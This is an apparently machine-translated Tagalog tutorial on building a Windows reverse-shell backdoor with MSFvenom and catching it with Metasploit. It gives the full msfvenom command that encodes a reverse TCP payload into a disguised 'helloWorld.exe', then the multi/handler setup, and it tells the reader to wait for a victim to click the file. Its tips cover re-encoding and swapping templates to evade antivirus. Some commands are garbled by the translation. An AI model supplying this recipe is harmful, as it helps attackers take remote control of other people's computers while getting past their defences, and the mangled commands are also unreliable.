Ginagamit ang isang backdoor upang laktawan ang mga mekanismo ng seguridad, madalas na palihim at karamihan ay hindi matukoy. Gamit ang MSFvenom, ang kombinasyon ng msfpayload at msfencode, posible na lumikha ng isang backdoor na kumokonekta pabalik sa umaatake sa pamamagitan ng paggamit ng reverse shell TCP. Upang makabuo ng isang backdoor, kailangan mong baguhin ang lagda ng iyong malware upang maiwasan ang anumang antivirus software. Kumpletuhin ang proyektong ito sa isang pares ng mga computer na mayroon kang pahintulot upang ma-access, at sa proseso, malalaman mo ang higit pa tungkol sa seguridad ng computer at kung paano gumagana ang ganitong uri ng backdoor.
Mga hakbang
Hakbang 1. Simulan ang Kali at sunugin ang Terminal console
Hakbang 2. I-type ang ifconfig upang maipakita ang interface at suriin ang iyong IP address
Hakbang 3. I-type ang msfvenom -l encoder upang maipakita ang listahan ng mga encoder
Gagamitin mo ang x86 / shikata_ga_nai bilang encoder
Hakbang 4. I-type ang "msfvenom -a x86 --platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe
- -Ang x86 - ang mga window ng window na format ay tumutukoy sa arkitekturang gagamitin.
- -p windows / shell / reverse_tcp itinalaga ang mga kargamento upang mai-embed.
- Itinalaga ng LHOST ang nakikinig na IP address.
- Itinalaga ng LPORT ang port ng nakikinig.
- -b "\ x00" itinalaga upang maiwasan ang masamang karakter (null bytes).
- -e x86 / shikata_ga_nai ay tumutukoy sa pangalan ng mga encoder.
- -f exe> helloWorld.exe ay nagtatalaga ng output output.
Hakbang 5. I-type ang msfconsole upang buhayin ang Metasploit
Ngayon ay nabuo mo ang iyong backdoor. Kapag nag-click ang biktima sa helloWorld.exe, ang shell payload na naka-embed ay isasaaktibo at gagawa ng isang koneksyon pabalik sa iyong system. Upang matanggap ang koneksyon, kailangan mong buksan ang multi-handler sa Metasploit at itakda ang mga kargamento
Hakbang 6. I-type ang paggamit exploit / multi / handler
Hakbang 7. I-type ang itakda ang mga windows ng kargamento / shell / reverse_tcp
Hakbang 8. I-type ang mga pagpipilian sa pagpapakita upang suriin ang modyul
Hakbang 9. Itakda ang uri ng LHOST 192.168.48.129
Itinalaga ng "LHOST" ang nakikinig na IP address
Hakbang 10. Itakda ang uri ng LPORT 4444
Itinalaga ng "LPORT" ang port ng nakikinig
Hakbang 11. I-type ang patakbuhin at hintayin ang koneksyon mula sa makina ng biktima
Hakbang 12. Hintaying mag-click ang biktima sa helloWorld.exe
Pagkatapos ay matagumpay kang makakakonekta sa makina ng biktima.
Mga Tip
- Ang paggamit ng -i sa MSFvenom ay kumakatawan sa mga pag-ulit ng pag-encode. Minsan mas maraming mga pag-ulit ay maaaring makatulong upang maiwasan ang AV software.
- Nalaman mo kung paano bumuo ng backdoor at naka-encode sa pamamagitan ng paggamit ng MSFvenom, ngunit ang pamamaraang ito ay hindi gagana nang perpekto laban sa ilan sa AV software sa kasalukuyan. Ang dahilan sa likod nito ay dahil sa mga template ng pagpapatupad sa MSFvenom. Ang mga vendor ng AV ay nagdagdag ng static na lagda ng mga template na ito at hanapin lamang ang mga ito. Ang solusyon para sa isyung ito ay ang paggamit ng ibang template ng pagpapatupad o iba't ibang mga tool.